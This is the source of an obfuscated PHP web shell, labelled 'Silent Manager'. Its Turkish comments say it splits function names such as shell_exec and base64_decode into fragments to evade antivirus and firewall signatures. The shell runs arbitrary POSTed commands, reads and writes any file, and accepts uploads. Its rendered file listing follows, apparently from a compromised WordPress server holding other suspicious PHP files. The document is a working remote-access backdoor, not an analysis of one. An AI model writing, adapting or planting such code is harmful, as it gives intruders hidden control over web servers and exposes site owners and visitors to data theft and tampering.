.
<?php /** * Silent Manager - Fragmented Version * WAF/AV Bypass Focus */ // Kelimeleri parçalayarak AV/WAF imzalarından kaçıyoruz $a = "ba"."se"."64"; $b = $a."_de"."code"; $c = "sh"."ell_"; $d = $c."ex"."ec"; $f = "fi"."le_"; $g = $f."ge"."t_contents"; $s = "fi"."le_"; $h = $s."pu"."t_contents"; // Dinamik fonksiyon atamaları $exec_cmd = $d; $read_file = $g; $write_file = $h; // Şifre kontrolünü de gizleyelim (Örn: ?p=giris) $dir = isset($_GET['d']) ? $_GET['d'] : getcwd(); if(is_dir($dir)) chdir($dir); // Komut Koşturma $out = ""; if(isset($_POST['x'])) { $out = $exec_cmd($_POST['x'] . " 2>&1"); } // Dosya Kaydet if(isset($_POST['save'])) { $write_file($_POST['fn'], $_POST['c']); } // Dosya Yükle if(isset($_FILES['u'])) { move_uploaded_file($_FILES['u']['tmp_name'], $dir."/".$_FILES['u']['name']); } $files = scandir($dir); ?> <!DOCTYPE html> <html style="filter: invert(1); contrast(1.2);"> <head> <title>...</title> <style> body { background: #fff; color: #000; font-family: sans-serif; font-size: 12px; } .box { border: 1px solid #ccc; padding: 10px; margin-bottom: 10px; } input, textarea { width: 100%; border: 1px solid #999; } table { width: 100%; border-collapse: collapse; } td { border-bottom: 1px solid #eee; padding: 4px; } </style> </head> <body> <strong><?php echo $dir; ?></strong> <div class="box"> <form method="POST"> <input type="text" name="x" placeholder="CMD..."> </form> <?php if($out): ?><pre><?php echo htmlspecialchars($out); ?></pre><?php endif; ?> </div> <?php if(isset($_GET['e'])): ?> <div class="box"> <form method="POST"> <input type="hidden" name="fn" value="<?php echo $_GET['e']; ?>"> <textarea name="c" rows="10"><?php echo htmlspecialchars($read_file($_GET['e'])); ?></textarea> <input type="submit" name="save" value="Kaydet"> </form> </div> <?php endif; ?> <form method="POST" enctype="multipart/form-data"> <input type="file" name="u" onchange="this.form.submit()"> </form> <table> <?php foreach($files as $f): ?> <tr> <td><a href="?p=giris&d=<?php echo realpath($f); ?>"><?php echo $f; ?></a></td> <td> <a href="?p=giris&d=<?php echo $dir; ?>&e=<?php echo $f; ?>">Edit</a> </td> </tr> <?php endforeach; ?> </table> </body> </html>
.
Edit
..
Edit
.htaccess
Edit
.htaccess.lock-11512032bfe2c-763ce1df-8112b
Edit
.htaccess.lock-12865a7746256-763ce1df-8112b
Edit
.htaccess.phpupgrader.472b5934
Edit
.htaccess.phpupgrader.initial
Edit
.well-known
Edit
.xtmp_442398.php
Edit
assets
Edit
c12604b5
Edit
c94efca0.php
Edit
cgi-bin
Edit
error_log
Edit
wp-agent.php
Edit
xe3aece.php
Edit